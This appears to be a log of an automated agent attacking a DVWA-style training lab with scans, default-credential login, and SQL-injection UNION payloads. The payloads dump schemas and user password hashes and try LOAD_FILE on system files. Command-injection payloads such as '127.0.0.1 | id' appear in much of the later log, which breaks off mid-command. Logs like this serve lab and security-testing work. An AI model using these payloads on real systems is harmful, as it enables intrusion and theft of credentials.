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6-03-06 15:19:43,260 [INFO] Executing command: which nmap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2026-03-06 15:19:43,271 [INFO] Executing command: which gobuster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2026-03-06 15:19:43,277 [INFO] Executing command: which dirb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2026-03-06 15:19:43,284 [INFO] Executing command: which nikto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2026-03-06 15:19:43,290 [INFO] 127.0.0.1 - - [06/Mar/2026 15:19:43] "GET /health HTTP/1.1" 200 -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2026-03-06 15:25:50,453 [INFO] Executing command: nmap -sV -sC -p 8081 100.113.75.28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2026-03-06 15:25:58,123 [INFO] 127.0.0.1 - - [06/Mar/2026 15:25:58] "POST /api/tools/nmap HTTP/1.1" 200 -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2026-03-06 15:26:05,673 [INFO] Executing command: curl -s http://100.113.75.28:8081/robots.txt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2026-03-06 15:26:05,744 [INFO] 127.0.0.1 - - [06/Mar/2026 15:26:05] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:26:07,827 [INFO] Executing command: curl -sv http://100.113.75.28:8081/ 2&gt;&amp;1 | head -60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2026-03-06 15:26:07,863 [INFO] 127.0.0.1 - - [06/Mar/2026 15:26:07] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:26:14,943 [INFO] Executing command: curl -s http://100.113.75.28:8081/backup/ &amp;&amp; echo "---" &amp;&amp; curl -s http://100.113.75.28:8081/debug/ &amp;&amp; echo "---" &amp;&amp; curl -s http://100.113.75.28:8081/admin/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2026-03-06 15:26:15,111 [INFO] 127.0.0.1 - - [06/Mar/2026 15:26:15] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:26:42,517 [INFO] Executing command: gobuster dir -u http://100.113.75.28:8081/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -t 30 -q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2026-03-06 15:27:12,127 [INFO] 127.0.0.1 - - [06/Mar/2026 15:27:12] "POST /api/tools/gobuster HTTP/1.1" 200 -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2026-03-06 15:27:27,182 [INFO] Executing command: curl -s http://100.113.75.28:8081/security.txt &amp;&amp; echo "==PHP.INI==" &amp;&amp; curl -s http://100.113.75.28:8081/php.ini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2026-03-06 15:27:27,249 [INFO] 127.0.0.1 - - [06/Mar/2026 15:27:27] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:27:31,412 [INFO] Executing command: curl -s http://100.113.75.28:8081/instructions.php | grep -i "flag\|vulnerability\|sql\|injection\|include\|upload\|command\|exec" | head -20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2026-03-06 15:27:31,482 [INFO] 127.0.0.1 - - [06/Mar/2026 15:27:31] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:27:47,794 [INFO] Executing command: curl -s -c /tmp/dvwa_cookies.txt -b "security=custom" \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=" \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http://100.113.75.28:8081/login.php -v 2&gt;&amp;1 | grep -E "Location|Set-Cookie|HTTP/"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2026-03-06 15:27:47,914 [INFO] 127.0.0.1 - - [06/Mar/2026 15:27:47] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:27:52,040 [INFO] Executing command: # Get the login page and extract CSRF token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TOKEN=$(curl -s -c /tmp/dvwa_cookies.txt http://100.113.75.28:8081/login.php | grep -o 'user_token.*value="[^"]*"' | grep -o '"[^"]*"$' | tr -d '"')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echo "Token: $TOKEN"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Now login with token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curl -s -c /tmp/dvwa_cookies.txt -b /tmp/dvwa_cookies.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$TOKEN" \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-D - http://100.113.75.28:8081/login.php | grep -E "Location|Cookie"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2026-03-06 15:27:52,166 [INFO] 127.0.0.1 - - [06/Mar/2026 15:27:52] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:02,812 [INFO] Executing command: # Get the login page and extract CSRF token properly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curl -s -c /tmp/dvwa_cookies.txt http://100.113.75.28:8081/login.php &gt; /tmp/login_page.html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TOKEN=$(grep -o 'user_token[^&gt;]*value="[^"]*"' /tmp/login_page.html | grep -o 'value="[^"]*"' | cut -d'"' -f2)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echo "Token: $TOKEN"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2026-03-06 15:28:02,939 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:02] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:12,241 [INFO] Executing command: cat /tmp/login_page.html | grep -i token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2026-03-06 15:28:12,253 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:12] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:15,305 [INFO] Executing command: TOKEN="3a9e1389ed66ac797cff5a3b67b8c870"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curl -s -c /tmp/dvwa_cookies.txt -b /tmp/dvwa_cookies.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$TOKEN" \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-D - http://100.113.75.28:8081/login.php | grep -E "^Location|Set-Cookie"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2026-03-06 15:28:15,373 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:15] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:35,734 [INFO] Executing command: # Verify we're logged in and check the security level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curl -s -b /tmp/dvwa_cookies.txt http://100.113.75.28:8081/index.php | grep -i "security\|level\|flag\|welcome\|logout" | head -10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2026-03-06 15:28:35,815 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:35] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:39,430 [INFO] Executing command: # Check current security level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curl -s -b /tmp/dvwa_cookies.txt http://100.113.75.28:8081/security.php | grep -i "security\|level\|select\|option" | head -15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2026-03-06 15:28:39,469 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:39] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:44,586 [INFO] Executing command: # Check Command Injection module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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/exec/" | grep -i "form\|input\|submit\|ip\|command" | head -10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2026-03-06 15:28:44,697 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:44] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:28:49,727 [INFO] Executing command: # Check SQL Injection module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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/sqli/" | grep -i "form\|input\|submit\|id\|user" | head -10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2026-03-06 15:28:49,802 [INFO] 127.0.0.1 - - [06/Mar/2026 15:28:49] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:29:11,282 [INFO] Executing command: # Get full SQL injection page source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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/sqli/" &gt; /tmp/sqli_page.html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grep -A2 -B2 "role\|debug\|hidden" /tmp/sqli_page.html | head -30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2026-03-06 15:29:11,353 [INFO] 127.0.0.1 - - [06/Mar/2026 15:29:11] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:29:17,822 [INFO] Executing command: # Check File Inclusion module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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/fi/?page=include.php" | grep -i "form\|include\|page\|file" | head -10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Also check the file upload module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echo "===UPLOAD==="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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/upload/" | grep -i "form\|input\|upload\|file" | head -10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2026-03-06 15:29:17,943 [INFO] 127.0.0.1 - - [06/Mar/2026 15:29:17] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:29:47,345 [INFO] Executing command: # Try basic SQLi test and observe the debug parameter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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/sqli/?id=1&amp;Submit=Submit" | grep -i "first\|last\|name\|result\|error\|sql" | head -15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2026-03-06 15:29:47,413 [INFO] 127.0.0.1 - - [06/Mar/2026 15:29:47] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:29:51,422 [INFO] Executing command: # View the source of the SQLi vulnerability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curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=sqli&amp;security=custom" | grep -v "^$" | head -60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2026-03-06 15:29:51,556 [INFO] 127.0.0.1 - - [06/Mar/2026 15:29:51] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:29:57,309 [INFO] Executing command: curl -s -b /tmp/dvwa_cookies.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=sqli&amp;security=custom" | python3 -c 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import sys, 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content = sys.stdin.read()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Strip HTML tags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clean = re.sub('&lt;[^&gt;]+&gt;', '', content)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Decode HTML entities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import html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clean = html.unescape(clean)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print(clean)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 | grep -A 200 "STEP 3" | head -100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2026-03-06 15:29:57,384 [INFO] 127.0.0.1 - - [06/Mar/2026 15:29:57] "POST /api/command HTTP/1.1" 200 -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AWAITING NEW PROMPT.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2026-03-06 15:33:22,116 [INFO] Executing command: # Fresh login to get valid session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curl -s -c /tmp/session.txt http://100.113.75.28:8081/login.php &gt; /tmp/lp.html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TOKEN=$(grep -o 'user_token.*value="[^"]*"' /tmp/lp.html | grep -o '"[^"]*"$' | tr -d '"')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echo "CSRF Token: $TOKEN"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curl -s -c /tmp/session.txt -b /tmp/session.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$TOKEN" \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-D - http://100.113.75.28:8081/login.php | grep "Location:"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2026-03-06 15:33:22,239 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:22] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:25,115 [INFO] Executing command: # Extract token more carefully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curl -s -c /tmp/session.txt http://100.113.75.28:8081/login.php &gt; /tmp/lp.html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grep "user_token" /tmp/lp.html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2026-03-06 15:33:25,152 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:25] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:27,644 [INFO] Executing command: TOKEN="9a64e8da2fa5d02a8b8f6cbb120b3a4d"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curl -s -c /tmp/session.txt -b /tmp/session.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$TOKEN" \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-D - http://100.113.75.28:8081/login.php | grep "Location:"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2026-03-06 15:33:27,712 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:27] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:32,282 [INFO] Executing command: # Test backdoor: role=admin + debug=1 + valid ID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curl -s -b /tmp/session.txt \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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=1&amp;Submit=Submit&amp;role=admin&amp;debug=1" \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| grep -E "QUERY|ERROR|sql_table|username|RAW=" | head -20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2026-03-06 15:33:32,350 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:32] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:38,331 [INFO] Executing command: # Test UNION with 4 columns (matching SELECT structure) - use URL encoding for safety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The query is: WHERE user_id = '{input}'  — we inject: ' UNION SELECT ...--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curl -s -b /tmp/session.txt \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--data-urlencode "id=1' UNION SELECT 1,2,3,4-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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--data-urlencode "debug=1" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep -E "QUERY|ERROR|sql_table|tr&gt;|RAW=" | head -20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2026-03-06 15:33:38,402 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:38] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:42,105 [INFO] Executing command: # Use GET method as the form uses GET, with proper URL encoding via curl -G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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=1' UNION SELECT 'A','B','C','D'-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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--data-urlencode "debug=1" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep -E "sql_table|&lt;td&gt;|QUERY|RAW=" | head -20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2026-03-06 15:33:42,177 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:42] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:47,955 [INFO] Executing command: # Enumerate all tables in current database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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema=database()-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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--data-urlencode "debug=1" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:33:48,073 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:48] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:53,635 [INFO] Executing command: # Enumerate ALL databases on the server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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT schema_name,2,3,4 FROM information_schema.schemata-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | grep -v "&lt;td&gt;2\|&lt;td&gt;3\|&lt;td&gt;4" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:33:53,757 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:53] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:33:57,957 [INFO] Executing command: # Enumerate columns in access_log and security_log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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT concat(table_name,':',column_name),2,3,4 FROM information_schema.columns WHERE table_schema=database()-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | grep -v "^.*&lt;td&gt;[234]&lt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$"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2026-03-06 15:33:58,081 [INFO] 127.0.0.1 - - [06/Mar/2026 15:33:58] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:03,437 [INFO] Executing command: # Dump access_log.action entries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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT action,timestamp,user_id,target_id FROM access_log LIMIT 10-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:34:03,560 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:03] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:08,118 [INFO] Executing command: # Dump security_log entries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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT action,ip_address,user_id,timestamp FROM security_log LIMIT 10-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:34:08,185 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:08] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:11,747 [INFO] Executing command: # Check users table - dump all fields including role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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT concat(user,':',role),password,first_name,last_name FROM users-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:34:11,824 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:11] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:22,507 [INFO] Executing command: # Try LOAD_FILE to read a known file - test with /etc/hostname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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT LOAD_FILE('/etc/hostname'),2,3,4-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | head -5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2026-03-06 15:34:22,628 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:22] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:26,871 [INFO] Executing command: # LOAD_FILE returned NULL - check FILE privilege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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT IFNULL(LOAD_FILE('/etc/hostname'),'NO_FILE_PRIV'),user(),@@secure_file_priv,4-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | head -8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2026-03-06 15:34:26,939 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:26] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:32,595 [INFO] Executing command: # Check guestbook for flag content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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT comment,name,comment_id,4 FROM guestbook-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:34:32,823 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:32] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:36,914 [INFO] Executing command: # Check information_schema for ALL tables (might be a hidden schema)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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT concat(table_schema,'.',table_name),2,3,4 FROM information_schema.tables WHERE table_schema NOT IN ('information_schema','performance_schema','mysql','sys')-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | grep -v "^.*&lt;td&gt;[234]&lt;/td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/' | grep -v "^[234]$"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2026-03-06 15:34:36,981 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:36] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:46,376 [INFO] Executing command: # Check avatar paths and any unusual user data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curl -s -b /tmp/session.txt -G \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--data-urlencode "id=999' UNION SELECT avatar,account_enabled,failed_login,last_login FROM users-- -" \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--data-urlencode "Submit=Submit" \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--data-urlencode "role=admin" \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"http://100.113.75.28:8081/vulnerabilities/sqli/" \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| grep "&lt;td&gt;" | sed 's/.*&lt;td&gt;\(.*\)&lt;\/td&gt;.*/\1/'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2026-03-06 15:34:46,444 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:46] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:52,355 [INFO] Executing command: # Test Command Injection - basic ping then chain a command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First, get CSRF token for exec page if needed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curl -s -b /tmp/session.txt "http://100.113.75.28:8081/vulnerabilities/exec/" &gt; /tmp/exec_page.html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grep -i "token\|csrf\|hidden" /tmp/exec_page.html | head -5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2026-03-06 15:34:52,427 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:52] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:55,939 [INFO] Executing command: EXEC_TOKEN="a70814a54759e3eaeebf9c41d42c0855"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Test basic command injection: pipe a command after IP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curl -s -b /tmp/session.txt \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--data-urlencode "ip=127.0.0.1 | id" \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--data-urlencode "Submit=Submit" \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--data-urlencode "user_token=$EXEC_TOKEN" \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"http://100.113.75.28:8081/vulnerabilities/exec/" \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| grep -A2 "pre\|result\|output" | head -15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2026-03-06 15:34:55,984 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:55] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:34:59,679 [INFO] Executing command: # Try different command injection bypass techniques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 1. Semicolon separator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curl -s -b /tmp/session.txt \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--data-urlencode "ip=127.0.0.1;id" \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--data-urlencode "Submit=Submit" \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--data-urlencode "user_token=$EXEC_TOKEN" \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"http://100.113.75.28:8081/vulnerabilities/exec/" | grep "&lt;pre&gt;" | head -5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2026-03-06 15:34:59,759 [INFO] 127.0.0.1 - - [06/Mar/2026 15:34:59] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:03,774 [INFO] Executing command: # View source of exec module for the custom security level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curl -s -b /tmp/session.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=exec&amp;security=custom" | python3 -c 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import sys, re, html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content = sys.stdin.read()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clean = re.sub('&lt;[^&gt;]+&gt;', '', content)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print(html.unescape(clean))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" | grep -A 50 "php" | head -60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2026-03-06 15:35:03,841 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:03] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:10,499 [INFO] Executing command: # Get raw source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curl -s -b /tmp/session.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=exec&amp;security=custom" | python3 -c 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import sys, re, html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content = sys.stdin.read()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Find code block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 = re.search(r'&lt;pre&gt;&lt;code[^&gt;]*&gt;(.*?)&lt;/code&gt;&lt;/pre&gt;', content, re.DOTALL)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if m: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clean = re.sub('&lt;[^&gt;]+&gt;', '', m.group(1))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print(html.unescape(clean))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print('No code block found')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print(content[:500])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2026-03-06 15:35:10,572 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:10] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:19,543 [INFO] Executing command: # Get full source page and look at what's there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curl -s -b /tmp/session.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=exec&amp;security=custom" | grep -i "code\|php\|filter\|shell\|exec\|strip" | head -20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2026-03-06 15:35:19,580 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:19] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:24,614 [INFO] Executing command: # Source code is empty for exec custom - let's try different bypass techniques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Try newline injection, &amp;&amp; , backticks, $()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for PAYLOAD in "127.0.0.1 &amp;&amp; id" "127.0.0.1 || id" "127.0.0.1%0aid" "127.0.0.1\nid" "; id #" "127.0.0.1$(id)"; do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RESULT=$(curl -s -b /tmp/session.txt \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-d "ip=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")&amp;Submit=Submit&amp;user_token=$EXEC_TOKEN" \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"http://100.113.75.28:8081/vulnerabilities/exec/" | grep -i "uid\|www-data\|root\|invalid\|blocked")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echo "PAYLOAD: $PAYLOAD -&gt; $RESULT"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2026-03-06 15:35:25,037 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:25] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:29,825 [INFO] Executing command: # Let me try the payload properly with URL encoding via curl's built-in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EXEC_TOKEN=$(curl -s -b /tmp/session.txt "http://100.113.75.28:8081/vulnerabilities/exec/" | grep "user_token" | grep -o 'value="[^"]*"' | cut -d'"' -f2)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echo "Token: $EXEC_TOKEN"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curl -s -b /tmp/session.txt \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--data-urlencode "ip=127.0.0.1 &amp;&amp; id" \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--data-urlencode "Submit=Submit" \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--data-urlencode "user_token=$EXEC_TOKEN" \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"http://100.113.75.28:8081/vulnerabilities/exec/" | grep -E "pre&gt;|uid|www" | head -10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2026-03-06 15:35:29,949 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:29] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:40,250 [INFO] Executing command: # Fresh session + token for exec module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curl -s -c /tmp/session2.txt http://100.113.75.28:8081/login.php &gt; /tmp/lp2.html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TOKEN2=$(grep "user_token" /tmp/lp2.html | grep -o 'value="[^"]*"' | cut -d'"' -f2)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curl -s -c /tmp/session2.txt -b /tmp/session2.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$TOKEN2" \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"http://100.113.75.28:8081/login.php" &gt; /dev/null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Get exec page token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curl -s -b /tmp/session2.txt "http://100.113.75.28:8081/vulnerabilities/exec/" &gt; /tmp/exec2.html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EXEC_TOKEN2=$(grep "user_token" /tmp/exec2.html | grep -o 'value="[^"]*"' | cut -d'"' -f2)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echo "Exec Token: $EXEC_TOKEN2"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2026-03-06 15:35:40,423 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:40] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:50,663 [INFO] Executing command: cat /tmp/exec2.html | grep "hidden\|token" | head -5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2026-03-06 15:35:50,672 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:50] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:35:52,883 [INFO] Executing command: cat /tmp/exec2.html | head -20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2026-03-06 15:35:52,893 [INFO] 127.0.0.1 - - [06/Mar/2026 15:35:52] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:00,170 [INFO] Executing command: wc -c /tmp/exec2.html &amp;&amp; cat /tmp/session2.txt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2026-03-06 15:36:00,205 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:00] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:07,053 [INFO] Executing command: # Session cookie seems valid, let me try direct request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curl -v -b "security=custom;PHPSESSID=77abec5f225f7f9edb1f282eefbabd8c" \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"http://100.113.75.28:8081/vulnerabilities/exec/" 2&gt;&amp;1 | grep -E "HTTP|Location|title" | head -5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2026-03-06 15:36:07,090 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:07] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:21,315 [INFO] Executing command: # Session expired - full fresh login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curl -s -c /tmp/s3.txt "http://100.113.75.28:8081/login.php" -o /tmp/login3.html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T=$(grep "user_token" /tmp/login3.html | grep -o "value='[^']*'" | tr -d "value='" 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echo "Token=$T"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curl -s -c /tmp/s3.txt -b /tmp/s3.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$T" \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-D /tmp/login_headers.txt \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"http://100.113.75.28:8081/login.php" -o /dev/null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cat /tmp/login_headers.txt | grep -E "Location|Cookie"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2026-03-06 15:36:21,432 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:21] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:31,418 [INFO] Executing command: # Token parsing issue - let me parse it properly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TOKEN_RAW=$(grep "user_token" /tmp/login3.html)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echo "$TOKEN_RAW"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2026-03-06 15:36:31,430 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:31] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:35,793 [INFO] Executing command: T="e69fd04852919726a6982a6f84015447"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curl -s -c /tmp/s3.txt -b /tmp/s3.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=$T" \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-D /tmp/h3.txt "http://100.113.75.28:8081/login.php" -o /dev/null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grep "Location" /tmp/h3.txt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 Now access exec page with follow redirects off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curl -s -b /tmp/s3.txt "http://100.113.75.28:8081/vulnerabilities/exec/" -o /tmp/exec3.html -D /tmp/exec_h.txt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grep "Location\|HTTP" /tmp/exec_h.txt | head -3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wc -c /tmp/exec3.html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2026-03-06 15:36:35,913 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:35] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:35,913 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:35] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:36:58,348 [INFO] Executing command: grep -i "token\|hidden\|form" /tmp/exec3.html | head -10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2026-03-06 15:36:58,360 [INFO] 127.0.0.1 - - [06/Mar/2026 15:36:58] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:37:02,910 [INFO] Executing command: EXEC_T="d5f86f9ae41edc83498cf7efe5e967c5"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 Try command injection payloads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for PAYLOAD in "127.0.0.1 | id" "127.0.0.1 &amp;&amp; id" "127.0.0.1; id" "; id" "| id"; do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RESULT=$(curl -s -b /tmp/s3.txt \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--data-urlencode "ip=$PAYLOAD" \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--data-urlencode "Submit=Submit" \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--data-urlencode "user_token=$EXEC_T" \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"http://100.113.75.28:8081/vulnerabilities/exec/" | grep -oE "uid=[0-9]+\([^)]+\)|invalid IP|blocked|ERROR")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echo "[$PAYLOAD] -&gt; $RESULT"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2026-03-06 15:37:03,616 [INFO] 127.0.0.1 - - [06/Mar/2026 15:37:03] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:37:18,110 [INFO] Executing command: # Token gets consumed. Need fresh token per request. Let me build a function.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exec_inject()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# Get fresh exec page (which also contains fresh CSRF token)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curl -s -b /tmp/s3.txt "http://100.113.75.28:8081/vulnerabilities/exec/" -o /tmp/exec_temp.html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ET=$(grep "user_token" /tmp/exec_temp.html | grep -o "value='[^']*'" | sed "s/value='\([^']*\)'/\1/")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curl -s -b /tmp/s3.txt \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--data-urlencode "ip=$1" \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--data-urlencode "Submit=Submit" \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--data-urlencode "user_token=$ET" \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"http://100.113.75.28:8081/vulnerabilities/exec/"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 Test injection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exec_inject "127.0.0.1 &amp;&amp; id" | grep -E "pre&gt;|uid|invalid|ERROR" | head -5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2026-03-06 15:37:18,228 [INFO] 127.0.0.1 - - [06/Mar/2026 15:37:18] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:37:35,006 [INFO] Executing command: # The exec module has strict IP validation at custom level. Let me check the source.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curl -s -b /tmp/s3.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=exec&amp;security=custom" \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| python3 -c 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import sys, re, html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 = sys.stdin.read()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 Try to find any PHP code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blocks = re.findall(r'color: #[0-9A-Fa-f]+\"&gt;(.*?)&lt;/span&gt;', c, re.DOTALL)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code = html.unescape(' '.join(blocks))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print(code[:3000])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2026-03-06 15:37:35,073 [INFO] 127.0.0.1 - - [06/Mar/2026 15:37:35] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:37:39,210 [INFO] Executing command: # Source is empty for exec/custom - it's likely using the 'impossible' level for exec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 Let's view the "compare all" source to understand what validation is happening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curl -s -b /tmp/s3.txt "http://100.113.75.28:8081/vulnerabilities/view_source_all.php?id=exec" \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| python3 -c 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import sys, re, html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 = sys.stdin.read()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m = re.search(r'impossible.*?&lt;pre&gt;&lt;code[^&gt;]*&gt;(.*?)&lt;/code&gt;&lt;/pre&gt;', c, 